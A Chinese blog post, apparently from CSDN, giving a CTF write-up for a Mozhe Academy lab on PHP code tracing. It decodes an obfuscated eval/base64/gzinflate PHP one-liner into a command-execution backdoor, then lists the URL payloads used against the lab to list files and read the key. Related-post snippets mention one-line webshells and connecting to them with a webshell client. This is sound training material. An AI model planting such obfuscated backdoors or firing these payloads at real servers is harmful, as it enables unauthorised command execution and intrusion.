墨者学院 PHP代码分析溯源(第4题) 详解

最新推荐文章于 2024-03-07 18:03:03 发布
最新推荐文章于 2024-03-07 18:03:03 发布
阅读量800 收藏 2
点赞数 4
分类专栏: CTF 文章标签: RCE 命令执行 渗透测试 CTF Web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_40228200/article/details/128271827
版权

今天继续给大家介绍CTF通关writeup,本文主要内容是墨者学院 PHP代码分析溯源(第4题)。

免责声明:
本文所介绍的内容仅做学习交流使用,严禁利用文中技术进行非法行为,否则造成一切严重后果自负!
再次强调:严禁对未授权设备进行渗透测试!

一、题目简介

今天,我们对墨者学院PHP代码分析溯源(第四题)进行学习,该题目地址为:https://www.mozhe.cn/bug/detail/T0YyUmZRa1paTkJNQ0JmVWt3Sm13dz09bW96aGUmozhe,打开后页面如下所示:
在这里插入图片描述
我们启动该靶场环境,打开后结果如下所示:
在这里插入图片描述

二、破解源码

从题目题设来看,我们需要做的第一步就是破解源码,我们先把题目中源代码复制下来,去掉最外层的eval函数后,添加echo函数,并将其复制为本地的PHP文件,文件内容如下所示:

<?php
echo gzinflate(base64_decode("&40pNzshXSFCJD3INDHUNDolOjE2wtlawt+MCAA==&"));
?>

之后,我们搭建好本地PHP环境,然后尝试访问该页面,结果如下所示:
在这里插入图片描述
从上图中可以看出,上述源代码在解析后,最外层是一个eval()函数的代码执行函数,而内层使用了反引号将代码执行转化为了命令执行,我们可以使用任意方式提交参数a,作为命令执行的输入。

三、命令执行拿到key

接下来,我们就可以利用a参数来提交命令,进而获得key了。首先,我们先查看当前web系统所在目录,构造payload如下所示:

http://124.70.91.203:45975/f.php?a=pwd

结果如下所示:
在这里插入图片描述
从上图中可以看出,当前网页根目录是/var/www/html,之后,我们来查看一下根目录内部有什么文件,构造payload如下所示:

http://124.70.91.203:45975/f.php?a=ls%20/var/www/html

该payload执行后结果如下所示:
在这里插入图片描述
在得到根目录下的文件后,我们怀疑key_813517043132.php文件即隐藏着key值,因此,我们尝试打开访问该文件,构造payload如下所示:

http://124.70.91.203:45975/f.php?a=cat%20key_813517043132.php

该payload执行后,结果如下所示:
在这里插入图片描述
我们需要打开文件网页源代码,就可以查看到该文件中的key值了。
原创不易,转载请说明出处:https://blog.csdn.net/weixin_40228200

永远是少年啊
关注
专栏目录
墨者学院 - PHP代码分析溯源(第2)
多崎巡礼的博客
07-30 1290
根据干看了好久的php隐式转换。。。 还是毫无头绪。。。 这样的逻辑几乎是无解的。。。 md5(QNKCDZO,32) = 0e830400451993494058024219903391   根据PHP Hash比较存在缺陷 http://www.freebuf.com/news/67007.html 。。。在这道中,最重要的一句话就是: 根据php的隐式转换可以知道 o...
墨者学院 - PHP代码分析溯源(第1)
多崎巡礼的博客
07-30 874
1、“^”为异或运算符。在PHP中,两个变量进行异或时,会将字符串转换成二进制再进行异或,异或完,又将结果从二进制转换成了字符串。 2、$_++;这行代码的意思是对变量名为"_"的变量进行自增操作,在PHP中未定义的变量默认值为null,null==false==0,可以在不使用任何数字的情况下,通过对未定义变量的自增操作来得到一个数字。 3、$__=("`"^"?").(":"^"}").("%.
墨者学院-PHP代码分析溯源(第3)
JimWu的博客
09-04 309
PHP代码分析溯源(第3) 难易程度:★★ 目类型:代码审计 使用工具:FireFox浏览器、记事本 1.打开靶场,下载网页源代码。 2.用文本打开源代码分析代码找出密码。 ①我们分析后,发现当密码小于等于9和大于等于1时,都会返回false。 所以我们可以知道密码应该不是数字,而是英文字母。 ②当我们看到return $number == '54975581388’时,我们知道在php...
墨者PHP代码分析溯源(第4)
zr1213159840的博客
01-16 662
首先打开页面,有个提示,而且还有段代码 仔细看下这段代码 <?php eval(gzinflate(base64_decode(&40pNzshXSFCJD3INDHUNDolOjE2wtlawt+MCAA==&))); ?> 能看出来首先是一段字符进行了解码,通过末尾的等于能看出来这是一段base64的解码,然后再使用前面的gzinflate函数执行了一次。gzinflate函数通过查询看是对数据进行了压缩,那么这段代码的含义就是对后面的字符串先解密然后压缩。我们直接对ev
墨者学院-PHP代码分析溯源(第4)
JimWu的博客
09-04 407
PHP代码分析溯源(第4) 难易程度:★★★ 目类型:命令执行 使用工具:FireFox浏览器 1.打开靶场,看到一串php代码。 2.使用echo,运行一下代码。 <?php echo(gzinflate(base64_decode("&40pNzshXSFCJD3INDHUNDolOjE2wtlawt+MCAA==&"))); ?> 得到echo $_REQU...
墨者学院 - PHP代码分析溯源(第4)
多崎巡礼的博客
08-05 1123
打开发现提示key在根目录,且给出代码 &lt;?php eval(gzinflate(base64_decode(&amp;40pNzshXSFCJD3INDHUNDolOjE2wtlawt+MCAA==&amp;))); ?&gt;  这是base64加密+压缩的编码 简单方法就是直接把eval改成echo输出 执行&lt;?php echo(gzinflate(base64_decode(‘...
PHP代码分析溯源(第1)
mozhe_的博客
05-25 1683
靶场地址:https://www.mozhe.cn/bug/detail/UW5xcFhsWE05akxJYjB1TzEyM2p3UT09bW96aGUmozhe靶场显示一段PHP源码,经分析:1、“^”为异或运算符。在PHP中,两个变量进行异或时,会将字符串转换成二进制再进行异或,异或完,又将结果从二进制转换成了字符串。2、$_++;这行代码的意思是对变量名为"_"的变量进行自增操作,在PHP中...
墨者学院 - WebShell代码分析溯源(第4)
多崎巡礼的博客
08-02 723
唉让我如此信任的工具在这道上栽了跟头。。。嗯,以后的结果仅供参考。   下载源代码,在hack文件夹下发现bin.php 打开分析代码得知其为php回调函数类一句话木马 且获得其密码,通过菜刀连接 菜刀连接http://219.153.49.228:42394/www/hack/bin.php?e=YXNzZXJ0 密码为POST array_filter()函数用回调函数过...
墨者学院 - WebShell代码分析溯源(第5)
多崎巡礼的博客
08-02 845
  一个个看,,,找到该文件,经典的回调函数形式 菜刀连接, ip/www/Exception.php?POST=assert 密码为assert 得到key 关于回调函数可参考此文章 https://blog.csdn.net/qq_24196029/article/details/78118680     &lt;?php error_reporting(0); call...
墨者学院 - WebShell代码分析溯源(第11)
多崎巡礼的博客
08-06 748
&lt;?php  if(!empty($_GET[1]) &amp;&amp; $_GET[1]=='GET.fPZ87'){                     //若get到的1不为空且1=GET.fPZ87的话执行下面操作     $_=@fopen('t.php', 'a');                                                      ...
php源码解读
06-08
php源码解读
代码溯源技术及开源软件的继承性分析1
08-03
研究背景在供应链全球化的背景下,授权 / 开源模式已成为重要的软件开发模式。的企业软件系统中引入了开源软件与此同时,在芯片领域,通过 IP 授权、架构授权和开源
墨者学院-CMS系统漏洞分析溯源(第4)
JimWu的博客
09-04 845
CMS系统漏洞分析溯源(第4) 难易程度:★★★ 目类型:身份认证和会话管理 使用工具:FireFox浏览器、wwwscan、菜刀 1.打开靶场,用wwwscan扫一下。 发现后台/admin/home.asp 2.访问后台http://219.153.49.228:49339/admin/home.asp,显示还没有登陆。 3.使用cookie-editor,伪造cookie,添加use...
墨者_PHP代码分析溯源(第4)
weixin_50698958的博客
10-13 250
靶场: https://www.mozhe.cn/bug/detail/T0YyUmZRa1paTkJNQ0JmVWt3Sm13dz09bW96aGUmozhe 背景介绍 小明收到一个网址,打开后是一串加密的代码。 小明需要你们的帮助,感受到时代在召唤了吗? 实训目标 1.了解命令执行的基础知识; 2.学习php代码的相关知识; 3.了解加密解密的相关知识; 解思路: 1、打开页面,提示信息如下 2、用php在线工具,使用echo运行一下代码(http://www.dooccn.com
墨者学院-php代码分析溯源
臭nana的博客
12-14 388
打开发现代码是base64+压缩的编码 最简单的方式是将eval变成echo,其他方法 得到echo `$_REQUEST[a]`;; ?&gt; 构造payload:?a=ls,发现key文件   用了ls就明白这是肯定不是在windows系统,所以不能用file_get_contents 两种方法: 1.使用cat不能直接读取出来,但可以查看源代码,在前面加view-...
墨者学院 - PHP代码分析溯源(第3)
多崎巡礼的博客
08-03 696
在for 循环中是判断输入的字符是否有存在在1和9之间的数字 如果不存在判断是否等于54975581388 等于则绕过 即 又不能等于数字1-9又要等于54975581388 但是这里在比较的时候就是用弱类型的,所以不要求完全一致。 php在转码时会把16进制转化为十进制.于是把54975581388转化成16进制0xccccccccc 键入 0xccccccccc 输入得到key...
PHP代码分析溯源(第4)
qq_36933272的博客
09-05 164
出现一串php代码,输出查看结果 获取表单a的内容,在f.php后面直接加?a=ls查看目录 发现key的php文件,直接a=cat key_228162644911001.php发现显示不出来 查看源代码得到key 查阅资料后发现tac替换cat就看的到了,tac是cat相反命令,也就是倒过来输出 ...
360众测靶场库之25-PHP代码分析溯源(第4)
最新发布
zjl12344的博客
03-07 218
360众测靶场
墨者学院 windows硬盘文件分析取证(新建的用户名) 犯罪嫌疑人在使用过电脑之后并
12-15
墨者学院的Windows硬盘文件分析取证是一种通过对电脑硬盘上的文件进行分析来获取相关信息的技术手段。当涉及到犯罪调查时,这项技术可以帮助警方揭示犯罪嫌疑人的行为轨迹和证据。 在对犯罪嫌疑人所使用的计算机...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

永远是少年啊

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值